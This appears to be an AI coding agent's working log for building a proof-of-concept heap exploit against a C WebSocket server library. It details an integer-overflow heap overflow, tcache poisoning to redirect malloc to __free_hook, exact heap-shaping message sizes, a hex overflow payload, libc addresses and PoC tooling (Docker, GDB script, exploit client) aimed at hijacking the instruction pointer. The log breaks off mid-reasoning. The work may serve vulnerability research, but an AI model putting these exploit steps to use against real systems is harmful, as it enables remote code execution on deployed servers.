- __malloc_hook = 0x7ffff7f9bb70
- system = 0x7ffff7e01290
- exit = 0x7ffff7df5a40

Heap state after the overflow:
- exploit chunk at 0x7ffff0000c60, size 0x25 (32 | PREV_INUSE | NON_MAIN_ARENA), user data at 0x7ffff0000c70
- msg_idx=144 (16 + 128 = 144, matching our 128-byte overflow)
- corrupted next chunk at 0x7ffff0000c80: prev_size=0, size=0x21, fd=0x4141414141414141
- free(msg) goes to tcache BEFORE the next-chunk size check, so no crash on the corrupted metadata

On glibc 2.31, free() checks tcache BEFORE checking the next chunk's size:
```c
if (tc_idx < mp_.tcache_bins && tcache && tcache->counts[tc_idx] < mp_.tcache_count) {
    tcache_put(p, tc_idx);
    return; // never reaches the corrupted next-chunk check
}
```

So we need to corrupt a chunk that is already in a tcache bin, not the top chunk.
The key insight from the recon: we need a free tcache chunk physically adjacent to the overflow buffer. The plan:
- base64_encode does malloc(29) → request2size(29) = 48 → same tcache bin (index 1)
- malloc(48) for msg → chunk A (from top)
- malloc(48) for echo response → chunk S1 (from top, adjacent to A)
- free(S1) → tcache[1]: S1 (count=1)
- free(A) → tcache[1]: A → S1 (count=2)
- exploit: malloc(48) drains A from tcache[1]; tcache[1] = S1 (count=1). The exploit buffer IS chunk A, and S1 (free, in tcache) is physically adjacent at A+48. The overflow starts at msg[24], and the layout relative to msg lets us overwrite S1's fd with &__free_hook.

On connection 2: the handshake's malloc(29) → 48-byte chunk → drains A from tcache. Then free(accept) puts A back. Sending 3 messages on connection 2: the 3rd malloc(48) returns &__free_hook. The echo response writes frame data there, setting __free_hook to a partially-controlled value. Then free(response) calls __free_hook → RIP jumps to that value.

__free_hook value limitation: the echo response frame header (bytes 0x82, 0x18) is fixed, corrupting the lowest 2 bytes of __free_hook. For the PoC, this is fine — any unmapped address proves RIP control. The frame header bytes are: response[0] = 0x82 (FIN=1, opcode=2), response[1] = 0x18 (length=24).
- bytes are read via next_byte(), which buffers up to MESSAGE_LENGTH=2048 bytes from the socket
- the overflow happens in read_single_frame BEFORE validate_utf8_txt is called, so no UTF-8 validation on overflow data
- ws_connection structs are in the static client_socks array (BSS), NOT on heap — can't overflow into them
- ws_getaddress() returns a pointer to client->ip (static buffer), does NOT strdup — no malloc in echo's onclose
- close_client() only closes socket + destroys mutexes — no malloc
- printf in onopen may initialize stdout buffer once (large allocation, ~8192 bytes)
- handshake allocations: calloc(61) → 64-byte, base64_encode → malloc(29) → 48-byte, malloc(130) → 144-byte, then frees
- dead code: ws_file() at ws.c:2078 references cli_events which doesn't exist — leftover from a refactoring.
Files created so far:
- AGENTS.md at repo root — compact instruction file for future agent sessions
- tests/Dockerfile.poc — Ubuntu 20.04 image, builds echo server with all protections disabled using direct gcc invocations (avoids Makefile's -O2 override)
- tests/poc_rip_control.c — full PoC client with a two-connection mode (-2 flag): overflow on conn 1, trigger on conn 2; builds with -std=c99 -Wall -Wextra
- tests/poc_gdb.txt — GDB script with breakpoints at vulnerable code, shows libc addresses, heap inspection at each phase
- tests/poc_run.sh — orchestration script with interactive and auto modes (Docker image ws-poc)

Key confirmed behavior: free() goes to tcache without checking the corrupted next chunk.

The critical next step is to retune the PoC for 48-byte chunks to poison tcache[1]:
Update the PoC command to use -n 1 -s 24 -f 24 -l 40 with a custom hex payload:
-o 00000000000000000000000000000000310048def9f7ff7f0000
This sets S1's prev_size=0, size=0x31 (48|PREV_INUSE), fd=__free_hook (0x7ffff7f9de48 LE)
Update the two-connection mode in poc_rip_control.c to send 3 messages on connection 2 (not just 1), because it takes 3 malloc(48) calls to drain tcache[1] → S1 → __free_hook:
- the 3rd malloc(48) returns __free_hook; the echo writes frame data to it, then free(response) calls __free_hook → SIGSEGV with controlled RIP

Rebuild the Docker image with the updated GDB script (fix the start vs run issue).
Run the tuned PoC and verify in GDB that:
- the poisoned tcache chain reaches __free_hook
- malloc(48) on connection 2 returns __free_hook
- free(response) triggers __free_hook → RIP = controlled value

Demonstrate RIP = 0x????????001882 (or similar) under GDB, proving RIP control.
Relevant files:
- AGENTS.md — repo instruction file (completed)
- tests/Dockerfile.poc — Docker build environment (completed, needs rebuild with updated GDB script)
- tests/poc_rip_control.c — PoC client (completed, needs update: two-connection mode should send 3 messages instead of 1)
- tests/poc_gdb.txt — GDB helper script (completed, working with start command)
- tests/poc_run.sh — orchestration script (completed)
- src/ws.c — the vulnerable file, especially:
  - read_single_frame: the vulnerable integer overflow
  - frame_state_data struct: field offsets (msg_data at 0, frame_length at 40, frame_size at 48, opcode at 64)
  - ws_frame_data struct: huge struct with frm[2048] buffer, frame_size at large offset
  - next_complete_frame: frame dispatch loop; error path at line 1713 does free(fsd.msg_data)
  - ws_establishconnection: main connection loop, calls onclose after error
  - ws_sendframe_internal: response allocation at line 636: malloc(header + length + 1)
  - next_byte: reads from socket into 2048-byte buffer
  - close_client: no malloc/free
  - ws_getaddress: returns static buffer, NO strdup
  - ws_connection struct: static array, not on heap
- include/ws.h — constants: MAX_FRAME_LENGTH=16MB, MESSAGE_LENGTH=2048, MAX_CLIENTS=8, WS_FIN=128, WS_FR_OP_CONT=0, WS_FR_OP_TXT=1, WS_FR_OP_BIN=2
- examples/echo/echo.c — target server binary; onclose has no malloc, onmessage calls ws_sendframe_bcast
- src/handshake.c — handshake allocations: calloc(61) → 64-byte, base64_encode → malloc(29) → 48-byte, malloc(130) → 144-byte
- Makefile — build system; CFLAGS uses += (can't easily override -O2), hence direct gcc invocation in Dockerfile

Ok, so we got the corruption working. Plan the control of RIP.
Let me re-examine the current state of the code and the heap layout to plan the RIP control precisely.
Now let me re-read the key vulnerable code and the echo server to understand the exact allocation/free patterns:
Now let me look at the error path and the connection lifecycle to understand exactly when free(msg_data) happens and what happens after:
Let me look at the handshake flow and the base64_encode allocation:
Now let me look at the do_handshake function to understand all allocations during connection setup:
Now I have a thorough understanding of the codebase. Let me now reason through the exploit strategy carefully.
Let me check the handshake allocation sizes more carefully:
The handshake get_handshake_accept does:
1. calloc(1, sizeof(char) * (WS_KEY_LEN + WS_MS_LEN + 1)) = calloc(1, 61) → chunk size = 64
2. base64_encode(hash, SHA1HashSize, NULL) → SHA1HashSize=20 → olen = 20*4/3+4 = 30, + 30/72=0, +1 = 31 → malloc(31) → chunk size = 48 (tcache bin idx 1)
3. free(str) → frees the 64-byte chunk
4. return accept (the 48-byte chunk)

Then get_handshake_response:
5. malloc(sizeof(char) * WS_HS_ACCLEN) = malloc(130) → chunk size = 144
6. free(accept) → frees the 48-byte chunk
Then do_handshake:
7. free(response) → frees the 144-byte chunk
So per handshake: allocates 64, 48, 144, then frees 64, 48, 144 (in that order).
Now for the echo path (onmessage → ws_sendframe_bcast → ws_sendframe_internal):
- malloc(2 + 24 + 1) = malloc(27) → request2size(27) = 32 → tcache bin idx 0 (for 32-byte chunks)
- free(response) → frees the 32-byte chunk

Wait, for a 24-byte payload the response is malloc(idx_first_rData + length + 1) = malloc(2 + 24 + 1) = malloc(27). request2size(27) = (27 + 16 + 15) & ~15 = 48. Actually let me recalculate:
- MINSIZE = 32 (for 64-bit), request2size(27) = (27 + 8 + 15) & ~15 = 50 & ~15 = 48. Wait no.
- REQUEST2SIZE(req) = (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK
- request2size(27) = (27 + 8 + 15) & ~15 = 50 & ~15 = 48. Hmm, that's a 48-byte chunk.
- tcache idx: (48 / 16) - 1 = 2. Wait...
- or (chunk_size - MINSIZE) / MALLOC_ALIGNMENT = (chunk_size / 16) - 1?

Wait, let me recalculate properly. On glibc 2.31 x86_64:
csize2tidx(x) = (x - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT

For 32: (32 - 32 + 15) / 16 = 15/16 = 0 → idx 0
For 48: (48 - 32 + 15) / 16 = 31/16 = 1 → idx 1
For 64: (64 - 32 + 15) / 16 = 47/16 = 2 → idx 2
So:
- malloc(31) → chunk 32 → tcache idx 0
- calloc(61) → chunk 64 → tcache idx 2
- malloc(130) → chunk 144 → tcache idx 7
- malloc(27) → chunk 32 → tcache idx 0 (same as handshake base64!)

So if we use 24-byte messages for shaping, the echo allocates 32-byte chunks (tcache idx 0), same bin as the handshake base64 allocation.
But the exploit frame 1 also needs to be a specific size. The msg allocation in read_single_frame is realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin). For frame 1 (non-FIN), *msg_idx = 0, fsd->is_fin = 0, so realloc(NULL, frame_length) = malloc(frame_length). If frame_length = 24, then malloc(24) → chunk 32 → tcache idx 0. Same bin.
Now, the key question is: can we get a free chunk from the handshake adjacent to our exploit buffer?
Let me think about this differently. The shaping phase happens on connection 1 after the handshake. The handshake on connection 1 allocates and frees: 64, 32, 144. After free(accept) (the 32-byte base64 chunk), tcache[0] has 1 entry. After free(str) (the 64-byte chunk), tcache[2] has 1 entry.
Then the first echo message (shaping): malloc(24) → gets the freed base64 chunk from tcache[0]. Echo sends: malloc(27) → gets a new chunk from top. Echo frees: free(response) (32-byte, into tcache[0]). Then free(msg) (32-byte, into tcache[0]).
So after 1 shaping message:
After 2 shaping messages:
Wait, let me trace more carefully.
After handshake frees on connection 1:
- free(accept) where accept was malloc(31) → chunk 32. tcache[0] = {accept}, count=1
- free(response) where response was malloc(130) → chunk 144. tcache[7] = {response}, count=1

free(str) happens first in get_handshake_accept before free(accept), and free(accept) happens in get_handshake_response, and free(response) happens in do_handshake.
In get_handshake_accept:
calloc(1, 61) → str (64-byte chunk)base64_encode(hash, 20, NULL) → malloc(31) → accept (32-byte chunk)free(str) → tcache[2] = {str}, count=1In get_handshake_response:
5. malloc(130) → response (144-byte chunk)
6. free(accept) → tcache[0] = {accept}, count=1
7. return response
In do_handshake:
8. SEND response
9. onopen callback
10. free(response) → tcache[7] = {response}, count=1
So after handshake:
Now, shaping message 1 (24-byte binary):
- read_single_frame: malloc(24) → chunk 32. Gets accept from tcache[0]. tcache[0] empty.
- onmessage → ws_sendframe_internal → malloc(27) → chunk 32. Comes from top.
- free(response) → tcache[0] = {response_echo1}, count=1
- free(wfd.msg) → free(msg) → tcache[0] = {msg1 → response_echo1}, count=2

So msg1 is at the same address as the original accept chunk, and response_echo1 is adjacent (from top). Actually no - response_echo1 comes from top, which is a different location than accept was.
Hmm. The problem is that we don't know the physical layout. Let me think about this from a higher level.
Actually, the key insight from the previous session's GDB run was:
The way to achieve this is to have the overflow buffer and an echo response allocated consecutively from top. Then when the echo response is freed, it goes to tcache, and the overflow can corrupt its fd pointer.
But wait - in the current flow, the overflow happens DURING read_single_frame, before the echo response is sent. So the echo response for the exploit message hasn't been allocated yet.
Let me reconsider. The exploit is:
1. malloc(24) → chunk A (from top or tcache)

After step 1, the only adjacent thing is whatever comes next from top (which would be the top chunk itself). There's no freed chunk adjacent to A.
Unless... we can pre-shape the heap so that a freed chunk IS adjacent to where A will be allocated.
Strategy:
- malloc(24) gets a specific chunk, and the physically next chunk is free in tcache

Let me think about this with concrete steps:
Step 1: Shaping on connection 1
- malloc(24) from tcache/top, malloc(27) from top, free(27) to tcache[0], free(24) to tcache[0]

Hmm, this is getting complicated. Let me think about what the GDB run showed us.
From the previous session's recon: the overflow was confirmed working - 128 bytes written past the buffer. The server survived because free() went to tcache. The next chunk was the top chunk.
The revised strategy from the summary was to use 48-byte chunks because the handshake's base64_encode does malloc(29) → 48-byte chunk, same tcache bin.
Wait, let me recalculate. base64_encode with SHA1HashSize=20:
- olen = 20*4/3 + 4 = 30
- olen += 30/72 = 0 → still 30
- olen++ → 31 (nul termination)
- malloc(31) → request2size(31) = (31+8+15) & ~15 = 54 & ~15 = 48
Now, if we make our shaping messages use a payload size that results in malloc(X) → 48-byte chunk too:
- shaping message payload X: malloc(X) → 48-byte chunk needs request2size(X) = 48, so X can be 25-40 (since (25+8+15) = 48 &~15 = 48 and (40+8+15)&~15 = 48, while (24+8+15) = 47 &~15 = 32).
- echo response: malloc(2 + X + 1) = malloc(X+3). For this to be a 48-byte chunk, X+3 must be 25-40, meaning X = 22-37.

Let's use X = 32 for simplicity.
Now the plan:
Connection 1:
1. malloc(32) → gets accept_base64 from tcache[1]. tcache[1] empty.
2. malloc(35) → from top. Call this chunk R1 (physically after accept_base64? No, accept_base64 is from the handshake, which was earlier...)
Let me re-trace the handshake allocation order:
1. calloc(1, 61) → str, chunk at top, 64 bytes → chunk_str
2. base64_encode → malloc(31) → accept, chunk at top+64, 48 bytes → chunk_accept
3. free(str) → chunk_str freed to tcache[2]
4. malloc(130) → response, chunk at top+64+48, 144 bytes → chunk_response
5. free(accept) → chunk_accept freed to tcache[1]
6. free(response) → chunk_response freed to tcache[7]
Now shaping message 1 (32 bytes):
1. malloc(32) → tcache[1] has chunk_accept → msg = chunk_accept. tcache[1] empty.
2. malloc(35) → need 48-byte chunk. tcache[1] empty → from top. chunk_echo1 at top (after chunk_response).
3. free(response_echo) → tcache[1] = {chunk_echo1}
4. free(msg) → tcache[1] = {chunk_accept → chunk_echo1}, count=2

Now the heap is: [freed chunk_str (64)] [freed chunk_accept (48)] [freed chunk_response (144)] [freed chunk_echo1 (48)] [top]
And tcache[1] = {chunk_accept → chunk_echo1}, count=2.
Now exploit:
malloc(32) → tcache[1] pops chunk_accept. tcache[1] = {chunk_echo1}, count=1.
Wait, that's the wrong bin! chunk_response is a 144-byte chunk in tcache[7], not tcache[1].
OK, so the physically adjacent chunk to chunk_accept is chunk_response (144 bytes). But that's in a different tcache bin. If we corrupt its fd, we'd need a 144-byte malloc to drain it, not a 48-byte malloc.
Hmm. Let me reconsider. I need the physically adjacent chunk to be:
Alternative approach: What if I don't use the handshake's freed chunks? What if I just send enough shaping messages so that two consecutive chunks from top end up in the right tcache bin?
After the handshake, the heap looks like:
[chunk_str freed (64)] [chunk_accept freed (48)] [chunk_response freed (144)] [top]
If I send shaping messages of size 32:
Shaping msg 1:
- malloc(32) → chunk_accept from tcache[1]
- malloc(35) → from top: chunk_E1 (48 bytes)
- free(echo1) → tcache[1] = {chunk_E1}
- free(msg1) → tcache[1] = {chunk_accept → chunk_E1}, count=2
Shaping msg 2:
- malloc(32) → chunk_accept from tcache[1]. tcache[1] = {chunk_E1}, count=1.
- malloc(35) → from top: chunk_E2 (48 bytes). Physically after chunk_E1!
- free(echo2) → tcache[1] = {chunk_E2 → chunk_E1}, count=2
- free(msg2) → tcache[1] = {chunk_accept → chunk_E2 → chunk_E1}, count=3

Wait, chunk_accept was just written back to tcache[1]. And chunk_E1 and chunk_E2 are consecutive from top. After chunk_E2 comes the top chunk.
Shaping msg 3:
- malloc(32) → chunk_accept from tcache[1]. tcache[1] = {chunk_E2 → chunk_E1}, count=2.
- malloc(35) → chunk_E1 from tcache[1]. tcache[1] = {chunk_E2}, count=1.
- free(echo3) → tcache[1] = {chunk_E1 → chunk_E2}, count=2. (chunk_E1 reused!)
- free(msg3) → tcache[1] = {chunk_accept → chunk_E1 → chunk_E2}, count=3

Hmm, this is getting tangled. Let me think differently.
I need:
Then overflow from X corrupts the fd pointer of the free chunk at X+48.
To get this layout, I need two consecutive 48-byte chunks from top, then free the second one.
Method:
- malloc(32) gets A from tcache[1]. tcache[1] = {B}, count=1.
- free(msg_data) frees A → tcache[1] = {A → __free_hook}, count=2.

Then on connection 2:
- malloc(31) → gets A from tcache[1]. tcache[1] = {__free_hook}, count=1.
- free(A) → tcache[1] = {A → __free_hook}, count=2.

Wait, but during the handshake, base64 is allocated and then freed. So:
- malloc(31) → gets A. tcache[1] = {__free_hook}.
- free(accept) → frees A. tcache[1] = {A → __free_hook}, count=2.

Then later on connection 2, send a message:
- malloc(32) → gets A from tcache[1]. tcache[1] = {__free_hook}, count=1.
- malloc(35) → gets __free_hook from tcache[1]!!! tcache[1] empty.
- free(response) where response = __free_hook → calls __free_hook(content) → RIP control!

This is the plan! But we need to be careful about what value gets written to __free_hook.
The echo response is constructed in ws_sendframe_internal:
```c
response = malloc(sizeof(unsigned char) * (idx_first_rData + length + 1));
...
response[0] = (WS_FIN | type);  // 0x82 for binary
response[1] = length & 0x7F;    // payload length (if <= 125)
...
for (i = 0; i < length; i++)
    response[idx_response++] = msg[i];
response[idx_response] = '\0';
```

So response[0] = 0x82, response[1] = payload_length. These overwrite the first 2 bytes of __free_hook.
Then free(response) is called with response pointing to __free_hook. If __free_hook is set to a value, free() will call that value with the response pointer as argument. But __free_hook hasn't been set yet! We're WRITING to __free_hook memory, not setting it as a function pointer.
Wait, I'm confusing things. The tcache poisoning makes malloc() return a pointer TO __free_hook (the variable in libc .bss). We then write our frame data TO that address. The frame data overwrites __free_hook's value.
So after the echo malloc(35) returns &__free_hook:
- response = &__free_hook
- response[0] = 0x82 (overwrites byte 0 of __free_hook)
- response[1] = payload_len (overwrites byte 1)
- response[2..2+msg_len-1] = msg content (overwrites bytes 2+)

So __free_hook's value becomes: the 8 bytes written starting at response[0].
For a 32-byte binary message:
__free_hook is at a fixed address. Its VALUE (which is a function pointer) gets overwritten with:
On little-endian x86_64, the function pointer value would be:
0x??????????20_0082 where ?????????? are our controlled bytes (from msg[0..5]).
For the PoC, we just need to show RIP control. Any crash at a controlled address is sufficient. So if we send a message with content like 0x4141414141414141..., __free_hook becomes 0x4141414141412082 (or similar).
But actually, we can be smarter. We need the response to be exactly sizeof(unsigned char) * (idx_first_rData + length + 1) bytes. For length <= 125, idx_first_rData = 2. So malloc(2 + length + 1). For this to be a 48-byte chunk: need request2size(2 + length + 1) = 48, so length + 3 must be 25-40, meaning length = 22-37.
If we use length=32: malloc(35) → 48-byte chunk → tcache[1]. Good.
Now, after the echo writes to __free_hook, __free_hook = some value we partially control. Then free(response) is called. Since __free_hook is now set, free() calls __free_hook(response), which is our_value(response).
For a pure PoC, we just need the crash at a controlled RIP. So __free_hook can be any invalid address.
But wait - there's a subtlety. The response variable in ws_sendframe_internal points to the address returned by malloc, which is &__free_hook. So free(response) = free(&__free_hook). And __free_hook is called with &__free_hook as argument. But by this time, __free_hook's VALUE has been overwritten by the frame header + content.
So: __free_hook(&__free_hook) where __free_hook = 0x??????????2082 (for 32-byte payload). RIP will be 0x??????????2082. This proves control.
But we CAN do better. If we use a payload size where the frame header doesn't corrupt the address too badly, or if we find a way to write a clean address...
Actually, the frame header is always 2 bytes (for length <= 125). So bytes 0-1 of __free_hook are always corrupted by the frame header. We can't avoid this for response sizes that use a 2-byte header.
But for the PoC, 0x??????????2082 is already RIP control! We just need to show the crash.
Wait, actually I should reconsider. The echo writes response content to response, which is &__free_hook. But response is a pointer to unsigned char. So:
- response[0] = frame[0] = 0x82 → byte at &__free_hook
- response[1] = frame[1] = length → byte at &__free_hook + 1
- response[2..2+length-1] = msg[0..length-1] → bytes at &__free_hook + 2 onwards

On x86_64 little-endian, __free_hook is an 8-byte function pointer. The value is loaded as:
So __free_hook = msg[5]<<56 | msg[4]<<48 | msg[3]<<40 | msg[2]<<32 | msg[1]<<24 | msg[0]<<16 | 0x2082
We control bytes 2-7 (msg[0..5]). For system at 0x7ffff7e01290, we'd need:
So we can't cleanly set __free_hook to system(). But for the PoC, we just need to prove RIP control. We can set msg[0..5] to something recognizable like \x41\x41\x41\x41\x41\x41 and show RIP = 0x4141414141412082.
Actually wait, I realize we should think about this more carefully. The critical path is:
After corrupting tcache[1] so that B.fd = &__free_hook:
base64_encode → malloc(31) → gets... hmm, which chunk?

Actually, the tcache[1] state after the overflow on connection 1 depends on what exactly we overwrite. Let me reconsider.
After shaping and before exploit:
malloc(32) → gets A from tcache[1]. Wait, no. After shaping msg 2 frees, tcache[1] has {A, B, ...}. Let me re-trace.

OK, I think the cleanest approach is:
Pre-conditions:
Exploit:
- malloc(32) for exploit frame 1 → gets the most recently freed chunk (let's call it A). tcache[1] now has B at head.

Wait, but tcache counts. When we popped A, count went from 2 to 1. B is still in tcache with count=1. After corrupting B's fd: tcache[1] = {B → __free_hook}, count=1.
- free(msg_data) = free(A). A goes to tcache[1]: {A → B → __free_hook}, count=2.

Wait, but A was the overflow buffer. After the overflow, the server hit the error path and called free(fsd.msg_data) at line 1713. That frees A. But A is still "valid" (it was allocated). So free(A) → tcache[1] = {A → B → __free_hook}, count=2.
Hmm, but after the overflow, next_byte() returns -1 (socket EOF), so read_single_frame returns -1, the loop breaks, and free(fsd.msg_data) is called at line 1713. That's free(A). Then the error propagates up, onclose is called, and the thread exits.
So after connection 1 closes:
But B's fd is corrupted. When the next malloc(31) pops A, tcache[1] = {B → __free_hook}, count=1. Then the next malloc(31) pops B, tcache[1] = {__free_hook}, count=0.
But wait, in the connection 2 handshake, base64_encode does malloc(31) which gets A. Then free(accept) = free(A) puts A back: tcache[1] = {A → __free_hook}, count=1.
Then in the connection 2 echo path:
- malloc(32) → gets A from tcache[1]. tcache[1] = {__free_hook}, count=0.
- malloc(35) → gets __free_hook!!! Writes frame data there.
- free(response) → response = __free_hook pointer. Since __free_hook was overwritten, __free_hook(response) is called → RIP control!
Actually wait, free(response) is called at line 687. By this point, response points to __free_hook's memory location. The content of __free_hook has been overwritten. So when free(response) is called:
free() checks __free_hook__free_hook is now 0x??????????2082 (not NULL)free() calls __free_hook(response) = 0x??????????2082(&__free_hook)0x??????????2082 is not a valid function addressSIGSEGV! RIP = 0x??????????2082. RIP control proven!
Now, for an even better demo, we could try to set __free_hook to system() or exit() for a cleaner crash. But the frame header corrupts the low 2 bytes. So we'd need:
Actually, for the PoC, just crashing at a controlled address is enough. We can set msg[0..5] to recognizable bytes and demonstrate RIP = that value.
But actually, there might be a way to write a clean value. What if we use a message that triggers a 10-byte frame header (for 64-bit length)? Then the frame header is 10 bytes, overwriting all 8 bytes of __free_hook.
For a length >= 65536: idx_first_rData = 10, so response = malloc(10 + length + 1). For this to be a 48-byte chunk: request2size(10 + length + 1) = 48, so 10 + length + 1 must be 25-40, meaning length = 14-29. But length must be >= 65536 for 10-byte header. Contradiction!
So 10-byte header isn't possible for 48-byte chunks. The 2-byte header is what we get.
We could also consider a message with 4-byte header (16-bit length, 126-65535): idx_first_rData = 4, so malloc(4 + length + 1). For 48-byte chunk: length + 5 in 25-40, so length = 20-35. But length must be 126-65535 for 4-byte header. Contradiction again.
So with 48-byte chunks, we always get a 2-byte header that corrupts the low 2 bytes of __free_hook.
For the PoC, this is fine. Let me plan the implementation.
Now let me also think about whether free(msg_data) on connection 1's error path will cause issues. After the overflow, msg_data = A (the exploit buffer). The overflow wrote past A, corrupting B's metadata. When free(A) is called:
Actually, A is a 48-byte chunk. User data starts at A (which is chunk+16). User data is 32 bytes (48 - 16). The overflow starts at msg[f1sz] where f1sz=32. So the overflow starts right at the boundary of A's user data! The first byte of the overflow goes into the next chunk's prev_size.
So A's own chunk metadata (prev_size and size at A-16) is untouched. Only the adjacent chunks are corrupted. free(A) should work fine because:
Good. So the plan is solid.
Let me also think about whether the free(msg_data) at line 1713 actually happens before or after the tcache is poisoned. The sequence is:
4. next_byte() returns -1 (EOF from our closed socket).
5. read_single_frame returns -1.
6. free(fsd.msg_data) = free(A) → A goes to tcache[1].

After step 6: tcache[1] = {A → B → __free_hook} (A was pushed to head, B was already there with corrupted fd, count goes to 2).
Wait, actually tcache[1] before step 6 was: {B → __free_hook}, count=1.
After free(A): tcache[1] = {A → B → __free_hook}, count=2.
But does tcache_put(A) check A's fd? No, it just sets A->next = tcache->entries[1], then tcache->entries[1] = A. So A->next = B. And B->next was corrupted to __free_hook.
So the chain is: A → B → __free_hook. Correct!
Now for connection 2:
malloc(31) → gets A from tcache[1]. count=1.
tcache[1] = {B → __free_hook}
free(accept) = free(A) → tcache_put. count=2.
tcache[1] = {A → B → __free_hook}

Now send a message on connection 2:
malloc(32) → gets A from tcache[1]. count=1.
tcache[1] = {B → __free_hook}
malloc(35) → gets B from tcache[1]. count=0.
tcache[1] = {__free_hook}

Hmm wait, that's wrong. After getting B, tcache[1] should be {__free_hook}, count=0. But actually, count was 1 when we popped B, so it goes to 0. And the head becomes B->next = __free_hook.
Actually, tcache works like this:
```c
// tcache_get
tcache->entries[tc_idx] = e->next;  // head = B->next = __free_hook
--(tcache->counts[tc_idx]);         // count = 0
return e;                           // returns B
```

So after getting B: tcache[1] = {__free_hook}, count=0. But the entry IS __free_hook, and count is 0. Can we still get it?
In glibc 2.31, tcache_get checks tc_idx < mp_.tcache_bins && tcache && tcache->entries[tc_idx] != NULL. It does NOT check counts! So even with count=0, if entries[tc_idx] is non-NULL, it will be returned.
Wait, actually I need to double-check. Let me look at the glibc 2.31 source:
```c
static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > (void *) 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  e->key = NULL;
  return (void *) e;
}
```

And in __libc_malloc:

```c
if (tc_idx < mp_.tcache_bins
    /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
    && tcache
    && tcache->entries[tc_idx] != NULL)
  {
    return tcache_get (tc_idx);
  }
```

Yes! It only checks entries[tc_idx] != NULL, not counts. So even with count=0, if the entry pointer is non-NULL, it's returned. The count becomes -1 (underflow), but that's fine for exploitation.
So after getting B for the echo response:
Then, the echo response writes to B. B is a legitimate chunk, so that's fine. Then free(response) = free(B). This goes to tcache_put. tcache[1] = {B → __free_hook}, count=1.
Wait, but free(B) checks tcache->counts[tc_idx] < mp_.tcache_count (which is 7 by default). Count is 0, which is < 7, so tcache_put succeeds. tcache[1] = {B → __free_hook}, count=1.
Hmm, but we've made no progress. We got B back, not __free_hook.
I think the issue is that connection 2's echo is the FIRST malloc on that thread's connection. But connection 2 has its OWN thread, which means... does each thread have its own tcache?
On glibc 2.31, tcache is per-thread! Each thread has its own tcache_perthread_struct. So connection 2's thread has an EMPTY tcache[1]!
This is a critical issue. The tcache we poisoned is connection 1's thread tcache. Connection 2 runs in a different thread with its own tcache.
Wait, but is this actually true? Let me reconsider. The wsServer creates a new thread per connection (ws_establishconnection runs in a thread). So connection 1 and connection 2 are in different threads, each with their own tcache.
So tcache poisoning from connection 1's thread does NOT affect connection 2's thread's tcache. This is a major problem.
But wait, the chunks we freed are in the ARENA, not just tcache. When tcache is full (7 entries), further frees go to the arena's fastbins. But we're dealing with tcache, not fastbins.
Hmm, but there's only one main arena (well, one arena per thread, but they share the same heap). Actually, on glibc 2.31, threads can have their own arenas, and tcache is per-thread.
But our GDB run showed the chunk had the NON_MAIN_ARENA flag set, meaning it's in a thread arena. Each arena has its own locks and chunk management.
So the tcache poisoning approach has a fundamental problem: we're poisoning connection 1's thread tcache, but we need connection 2's thread to hit it.
Wait, let me reconsider. Are there ways around this?
But on connection 1, after the overflow, the server hits the error path and calls free(msg_data), then onclose, then the thread exits. No more mallocs.
Unless... we can make the server NOT error out after the overflow. But the overflow triggers because next_byte() returns -1 (we close the socket). If we DON'T close the socket, the write loop keeps going (writing our overflow data). After the write loop, the frame is complete (FIN=1), and next_complete_frame returns with the message. Then onmessage is called, which does ws_sendframe_bcast → malloc(response). That malloc would be on the SAME thread!
Wait, this is a much better approach! Let me re-read the write loop:
```c
for (i = 0; i < fsd->frame_length; i++, (*msg_idx)++)
{
    cur_byte = next_byte(wfd);
    if (cur_byte == -1)
        return (-1);
    msg[*msg_idx] = cur_byte ^ masks[i % 4];
}
```
The write loop reads one byte at a time via next_byte(). It writes fsd->frame_length bytes (which is huge, ~2^64). After writing our overflow bytes, it needs MORE bytes from the socket. If we close the socket, next_byte() returns -1, and the loop exits.
But what if we send exactly the right number of overflow bytes and then... we can't send 2^64 bytes. The loop will always hit EOF.
Unless we change the approach. What if we make the overflow length smaller? Instead of 2^64-11, what if we use a length that wraps to a small value but the actual overflow is just a few dozen bytes?
The current setup:
- frame_size = f1sz + length = 5 (mod 2^64) → passes the check
- realloc(msg, f1sz + length + 1) = realloc(msg, 6) → tiny, same pointer
- write loop: `length` bytes starting at msg[f1sz]

But length = 5 - f1sz = 0xFFFFFFFFFFFFFFF5 for f1sz = 16. That's way too many bytes.
What if f1sz = 4 and length = 1? Then frame_size = 5, realloc(msg, 6), write loop writes 1 byte. No overflow.
The problem is that to overflow, we need length to be huge (wrapping around). And the write loop tries to read length bytes, which will always hit EOF.
So on a single connection, after the overflow, the server always errors out. The thread exits. No more mallocs on that thread.
OK so we're back to the cross-thread problem. Let me think about alternatives:
Alternative 1: Use the main arena's fastbins instead of tcache
Fastbins are per-arena, not per-thread (well, each thread has its own arena, but the main arena is shared). Actually no, fastbins are also per-arena.
Hmm, but on glibc 2.31, the first thread uses the main arena. Additional threads may use the main arena too (if it's not locked) or get their own arena.
Actually, the NON_MAIN_ARENA flag we saw suggests the chunk was in a thread arena. But if multiple connections share the same arena, then the fastbins are shared.
Let me think about this differently. In practice, for the PoC:
But actually, tcache takes priority over fastbins. When we free a chunk, it goes to the current thread's tcache first. When we malloc, the current thread's tcache is checked first. So even if the chunk is in a shared arena, the per-thread tcache intercepts it.
This means that for tcache poisoning to work cross-thread, we'd need to corrupt the other thread's tcache. But the other thread's tcache struct is in a different heap allocation.
Wait, what if we can overflow into ANOTHER thread's tcache_perthread_struct? That seems very unlikely with our fixed overflow pattern.
Alternative 2: Make the write loop succeed
What if instead of having the write loop hit EOF, we make it succeed by providing enough data? The frame length is huge, but next_byte() reads from a 2048-byte buffer. If we fill the buffer, the loop writes 2048 bytes, then next_byte() tries to read more from the socket.
But fsd->frame_length is ~2^64. We can't send that many bytes. The loop will hit EOF.
Unless... we modify the approach so that the write loop only overwrites a small number of bytes.
Wait, what about a different exploitation path? Instead of using the continuation frame integer overflow, what if we look at the error path more carefully?
Actually, let me reconsider the approach. What if we DON'T close connection 1 after the overflow? Instead:
1. next_byte() returns -1 → read_single_frame returns -1
